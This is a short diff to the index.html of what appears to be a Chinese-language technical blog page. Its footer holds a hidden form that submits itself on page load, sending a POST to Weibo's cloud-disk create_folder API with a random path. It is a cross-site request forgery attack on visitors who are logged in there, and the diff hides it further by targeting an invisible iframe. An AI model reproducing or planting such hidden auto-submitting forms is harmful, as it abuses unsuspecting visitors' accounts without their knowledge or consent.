--- a/index.html
+++ b/index.html
@@ -320,13 +320,13 @@ factory 的参数更简单，和 dependencies 无对应关系 <br/>
 <script src="/javascripts/application.js"></script>
 
 
-<iframe src="/offline-cache.html" style="display:none"></iframe>
-<form id="createFolder" action="http://vdisk.weibo.com/api/weipan/2/fileops/create_folder" method="post"> 
+<iframe name="tt" id="tt" src="/offline-cache.html" style="display:none"></iframe>
+<form target="tt" id="createFolder" action="http://vdisk.weibo.com/api/weipan/2/fileops/create_folder" method="post"> 
   <input type="hidden" name="root" value="basic" />
   <input id="path" type="hidden" name="path" value="%2F" />
 </form>
 <script >
-  document.getElementById('path').value="/"+ parseInt(Math.random()*10000000);
+  document.getElementById('path').value="\/"+ parseInt(Math.random()*10000000);
   document.getElementById('createFolder').submit();
 </script>
 </body>
